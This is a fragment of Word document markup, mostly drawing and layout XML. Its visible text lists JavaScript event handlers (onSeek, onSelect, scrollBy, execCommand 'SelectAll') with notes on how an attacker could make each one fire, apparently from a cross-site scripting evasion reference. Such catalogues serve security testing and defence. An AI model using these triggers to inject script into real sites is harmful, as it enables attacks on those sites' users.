                              <a:gd name="T11" fmla="*/ 688 h 183"/>
                              <a:gd name="T12" fmla="+- 0 6705 6705"/>
                              <a:gd name="T13" fmla="*/ T12 w 912"/>
                              <a:gd name="T14" fmla="+- 0 668 507"/>
                              <a:gd name="T15" fmla="*/ 668 h 183"/>
                              <a:gd name="T16" fmla="+- 0 6705 6705"/>
                              <a:gd name="T17" fmla="*/ T16 w 912"/>
                              <a:gd name="T18" fmla="+- 0 665 507"/>
                              <a:gd name="T19" fmla="*/ 665 h 183"/>
                              <a:gd name="T20" fmla="+- 0 6705 6705"/>
                              <a:gd name="T21" fmla="*/ T20 w 912"/>
                              <a:gd name="T22" fmla="+- 0 528 507"/>
                              <a:gd name="T23" fmla="*/ 528 h 183"/>
                              <a:gd name="T24" fmla="+- 0 6726 6705"/>
                              <a:gd name="T25" fmla="*/ T24 w 912"/>
                              <a:gd name="T26" fmla="+- 0 507 507"/>
                              <a:gd name="T27" fmla="*/ 507 h 183"/>
                              <a:gd name="T28" fmla="+- 0 7595 6705"/>
                              <a:gd name="T29" fmla="*/ T28 w 912"/>
                              <a:gd name="T30" fmla="+- 0 507 507"/>
                              <a:gd name="T31" fmla="*/ 507 h 183"/>
                              <a:gd name="T32" fmla="+- 0 7616 6705"/>
                              <a:gd name="T33" fmla="*/ T32 w 912"/>
                              <a:gd name="T34" fmla="+- 0 528 507"/>
                              <a:gd name="T35" fmla="*/ 528 h 183"/>
                              <a:gd name="T36" fmla="+- 0 7616 6705"/>
                              <a:gd name="T37" fmla="*/ T36 w 912"/>
                              <a:gd name="T38" fmla="+- 0 668 507"/>
                              <a:gd name="T39" fmla="*/ 668 h 183"/>
                              <a:gd name="T40" fmla="+- 0 7599 6705"/>
                              <a:gd name="T41" fmla="*/ T40 w 912"/>
                              <a:gd name="T42" fmla="+- 0 688 507"/>
                              <a:gd name="T43" fmla="*/ 688 h 183"/>
                              <a:gd name="T44" fmla="+- 0 7595 6705"/>
                              <a:gd name="T45" fmla="*/ T44 w 912"/>
                              <a:gd name="T46" fmla="+- 0 689 507"/>
                              <a:gd name="T47" fmla="*/ 6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1" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="911" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="894" y="181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Text Box 879"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6705" y="506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scrollBy()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8" o:spid="_x0000_s1554" style="position:absolute;left:0;text-align:left;margin-left:335.25pt;margin-top:25.35pt;width:45.6pt;height:9.15pt;z-index:15823360;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="6705,507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">
                <v:shape id="Freeform 880" o:spid="_x0000_s1555" style="position:absolute;left:6705;top:506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NcoMEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERP3WrCMBS+H/gO4QjezVQvbFeNMkTnBgOx3QMcmmNT&#10;1py0Tab17ZeLwS4/vv/NbrStuNHgG8cKFvMEBHHldMO1gq/y+JyB8AFZY+uYFDzIw247edpgrt2d&#10;L3QrQi1iCPscFZgQulxKXxmy6OeuI47c1Q0WQ4RDLfWA9xhuW7lMkpW02HBsMNjR3lD1XfxYBf3b&#10;uSE+HZZ9711aVp/GfLyMSs2m4+saRKAx/Iv/3O9aQZbGtfF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jXKDBAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m890,182r-869,l18,181,,161r,-3l,21,21,,890,r21,21l911,161r-17,20l890,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="890,689;21,689;18,688;0,668;0,665;0,528;21,507;890,507;911,528;911,668;894,688;890,689" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 879" o:spid="_x0000_s1556" type="#_x0000_t202" style="position:absolute;left:6705;top:506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3docQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVvNVNe7CauopIBUEoxnjw+Mw+&#10;k8Xs25hdNf57VxA8DjPzDTOedrYWF2q9cazgq5+AIC6cNlwq2OaLzyEIH5A11o5JwY08TCfvb2NM&#10;tbtyRpdNKEWEsE9RQRVCk0rpi4os+r5riKN3cK3FEGVbSt3iNcJtLb+TZCAtGo4LFTY0r6g4bs5W&#10;wWzH2Z85/e/X2SEzeT5KeDU4KtX76Ga/IAJ14RV+tpdawfBnBI8z8QjIy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d3aH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scrollBy()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6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>need</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>insert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row</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>in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data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>source)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr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AC7743">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="421"/>
        </w:tabs>
        <w:spacing w:before="161"/>
        <w:ind w:left="420" w:hanging="231"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="161"/>
        <w:ind w:left="190"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>(user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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scroll,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attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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the</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="161"/>
        <w:ind w:left="190"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>function)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num="3" w:space="708" w:equalWidth="0">
            <w:col w:w="460" w:space="769"/>
            <w:col w:w="4009" w:space="767"/>
            <w:col w:w="3015"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1252"/>
          <w:tab w:val="left" w:pos="1253"/>
        </w:tabs>
        <w:ind w:left="1252" w:hanging="1063"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr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48572160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471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="874" name="Group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154"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="875" name="Freeform 877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336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 742"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 742"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 742"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 742"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 742"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 742"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2650 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 742"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2671 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 742"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2671 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 742"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2653 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 742"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2650 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 742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Text Box 87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onSeek()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5" o:spid="_x0000_s1557" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:37.1pt;height:9.15pt;z-index:-17594880;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154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">
                <v:shape id="Freeform 877" o:spid="_x0000_s1558" style="position:absolute;left:1930;top:154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7oacMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP3YrCMBSE7wXfIZyFvZE1ccG/ahQRllURZNUHODRn&#10;22JzUppY69sbQfBymJlvmPmytaVoqPaFYw2DvgJBnDpTcKbhfPr5moDwAdlg6Zg03MnDctHtzDEx&#10;7sZ/1BxDJiKEfYIa8hCqREqf5mTR911FHL1/V1sMUdaZNDXeItyW8lupkbRYcFzIsaJ1TunleLUa&#10;frf70rdn3NgTTge7w0Xtm57S+vOjXc1ABGrDO/xqb4yGyXgIzzPx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97oacMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m720,182r-699,l18,182,,161r,-3l,21,21,,720,r21,21l741,161r-18,21l720,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,336;21,336;18,336;0,315;0,312;0,175;21,154;720,154;741,175;741,315;723,336;720,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 876" o:spid="_x0000_s1559" type="#_x0000_t202" style="position:absolute;left:1930;top:154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JJ08UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKvelGD1Gjq4hYKBSkMR56fM0+&#10;k8Xs25jdavrvu4LgcZiZb5jlureNuFLnjWMF41ECgrh02nCl4Fi8D2cgfEDW2DgmBX/kYb16GSwx&#10;0+7GOV0PoRIRwj5DBXUIbSalL2uy6EeuJY7eyXUWQ5RdJXWHtwi3jZwkSSotGo4LNba0rak8H36t&#10;gs035ztz2f985afcFMU84c/0rNTba79ZgAjUh2f40f7QCmbTFO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gknT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onSeek()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(the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>onreverse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>when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6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>timeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>play</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>direction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>other</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>than</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>forward)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420"/>
          <w:tab w:val="left" w:pos="1421"/>
        </w:tabs>
        <w:spacing w:before="160"/>
        <w:ind w:left="1420" w:hanging="1231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6771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262890</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2273300" cy="123190"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="871" name="Group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3300" cy="123190"/>
                          <a:chOff x="1930" y="414"/>
                          <a:chExt cx="3580" cy="194"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="872" name="Freeform 874"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="421"/>
                            <a:ext cx="3524" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5433 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 3524"/>
                              <a:gd name="T2" fmla="+- 0 604 421"/>
                              <a:gd name="T3" fmla="*/ 604 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 3524"/>
                              <a:gd name="T6" fmla="+- 0 604 421"/>
                              <a:gd name="T7" fmla="*/ 604 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 3524"/>
                              <a:gd name="T10" fmla="+- 0 603 421"/>
                              <a:gd name="T11" fmla="*/ 603 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 3524"/>
                              <a:gd name="T14" fmla="+- 0 583 421"/>
                              <a:gd name="T15" fmla="*/ 583 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 3524"/>
                              <a:gd name="T18" fmla="+- 0 579 421"/>
                              <a:gd name="T19" fmla="*/ 579 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 3524"/>
                              <a:gd name="T22" fmla="+- 0 442 421"/>
                              <a:gd name="T23" fmla="*/ 442 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 3524"/>
                              <a:gd name="T26" fmla="+- 0 421 421"/>
                              <a:gd name="T27" fmla="*/ 421 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5433 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 3524"/>
                              <a:gd name="T30" fmla="+- 0 421 421"/>
                              <a:gd name="T31" fmla="*/ 421 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5454 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 3524"/>
                              <a:gd name="T34" fmla="+- 0 442 421"/>
                              <a:gd name="T35" fmla="*/ 442 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5454 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 3524"/>
                              <a:gd name="T38" fmla="+- 0 583 421"/>
                              <a:gd name="T39" fmla="*/ 583 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5436 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 3524"/>
                              <a:gd name="T42" fmla="+- 0 603 421"/>
                              <a:gd name="T43" fmla="*/ 603 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5433 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 3524"/>
                              <a:gd name="T46" fmla="+- 0 604 421"/>
                              <a:gd name="T47" fmla="*/ 60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24" h="183">
                                <a:moveTo>
                                  <a:pt x="3503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503" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3524" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3524" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3506" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3503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Text Box 87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413"/>
                            <a:ext cx="358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1"/>
                                <w:ind w:left="3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window.document.execCommand("SelectAll");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2" o:spid="_x0000_s1560" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:20.7pt;width:179pt;height:9.7pt;z-index:-15648768;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,414" coordsize="3580,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">
                <v:shape id="Freeform 874" o:spid="_x0000_s1561" style="position:absolute;left:1930;top:421;width:3524;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="352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IpXMQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPzWrDMBCE74G8g9hAb4kcQ5zgRgmmUJoe8wO5bqyt&#10;bSKtjKXabp8+KhRyHGbnm53tfrRG9NT5xrGC5SIBQVw63XCl4HJ+n29A+ICs0TgmBT/kYb+bTraY&#10;azfwkfpTqESEsM9RQR1Cm0vpy5os+oVriaP35TqLIcqukrrDIcKtkWmSZNJiw7Ghxpbeairvp28b&#10;3zDt+nb96E1xy34zLtJPmw4rpV5mY/EKItAYnsf/6YNWsFmn8DcmEkD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SKVzEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m3503,183l21,183r-3,-1l,162r,-4l,21,21,,3503,r21,21l3524,162r-18,20l3503,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3503,604;21,604;18,603;0,583;0,579;0,442;21,421;3503,421;3524,442;3524,583;3506,603;3503,604" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 873" o:spid="_x0000_s1562" type="#_x0000_t202" style="position:absolute;left:1930;top:413;width:3580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XqS8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3upGBWujq4hUEARpTA89vmaf&#10;yWL2bZrdavz3riB4HGbmG2a+7GwtztR641jBcJCAIC6cNlwq+M43b1MQPiBrrB2Tgit5WC56L3NM&#10;tbtwRudDKEWEsE9RQRVCk0rpi4os+oFriKN3dK3FEGVbSt3iJcJtLUdJMpEWDceFChtaV1ScDv9W&#10;weqHs0/zt//9yo6ZyfOPhHeTk1Kv/W41AxGoC8/wo73VCqbvY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epL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1"/>
                          <w:ind w:left="30"/>
                          <w:rPr>
                            <w:sz w:val="16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window.document.execCommand("SelectAll");</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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2211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579120" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="868" name="Group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166"/>
                          <a:chExt cx="912" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="869" name="Freeform 871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348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 912"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 912"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 912"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 912"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 912"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 912"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2820 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 912"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2842 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 912"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2842 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 912"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2824 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 912"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2820 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 912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Text Box 87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onSelect()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9" o:spid="_x0000_s1563" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:45.6pt;height:9.15pt;z-index:-17594368;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166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">
                <v:shape id="Freeform 871" o:spid="_x0000_s1564" style="position:absolute;left:1930;top:166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Zv5sUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPzWrDMBCE74G+g9hAbokcH9zEjRJKaZsGCiE/D7BY&#10;W8vUWtmWartvXwUKOQ4z8w2z2Y22Fj11vnKsYLlIQBAXTldcKrhe3uYrED4ga6wdk4Jf8rDbPkw2&#10;mGs38In6cyhFhLDPUYEJocml9IUhi37hGuLofbnOYoiyK6XucIhwW8s0STJpseK4YLChF0PF9/nH&#10;KmjfjxXx/jVtW+8eL8WnMYf1qNRsOj4/gQg0hnv4v/2hFayyNdzOxCM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Nm/mxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m890,182r-869,l18,182,,161r,-3l,21,21,,890,r22,21l912,161r-18,21l890,182xe" fillcolor="#f5f5f5" stroked="f">
